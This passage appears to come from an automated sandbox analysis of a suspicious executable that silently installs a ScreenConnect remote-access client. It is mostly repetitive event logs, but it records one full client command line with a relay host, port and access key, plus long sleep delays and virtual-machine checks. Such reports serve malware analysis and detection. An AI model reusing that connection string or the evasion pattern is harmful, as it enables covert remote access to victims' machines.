                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: FD0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: 2980000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: 4980000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: 6140000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: 58F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: 7140000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: 8140000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: 6140000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: 6140000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: 83D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMemory allocated: 14E0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMemory allocated: 1720000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMemory allocated: 1560000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: C70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: 1AC40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: F80000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: 1AD50000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI576D.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5529.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Users\user\Desktop\H36NgltNe7.exe TID: 2700Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe TID: 3240Thread sleep count: 53 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe TID: 5916Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2758072444.0000000004D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                              Source: H36NgltNe7.exe, 00000000.00000002.1485228493.0000000000DED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}U
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                              Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: 0.2.H36NgltNe7.exe.2860000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.clientservice.exe" "?e=access&y=guest&h=lokistorage.xyz&p=8041&s=3a500b51-1436-4bf3-8200-68822bcae42d&k=bgiaaackaabsu0exaagaaaeaaqchadx0vdcoypzw3rhl2%2fwsmdfp2rmcowlbz1ecggd2oi1gruiacwzcrkszxbywgdfgxdbyoegqdwtpmoqlg8jof4zkxvyt9zhvvqib5ire7%2frfo81g3%2b6hxkpjc0inqs%2bxruwq1z%2b6smxqscbb%2fykhdhw7ahbhyk65snb5ak02%2bpswsu904ncqii1vfx60s4cj8ilr9kifjwymgg0rdnakscv6gau5odsv8wz3cfurc2fznj8a0fkfb5xyik39fbiivzp4vyfarunnluqwccrm3hrkoohc9g96dlui6y4avh5vyzfnxeaixqvrlqzjtpadrhivwzf5sgoywqiok%2bc5&t=patrycja%20bochenek&c=pl&c=dariusz&c=&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformationJump to behavior
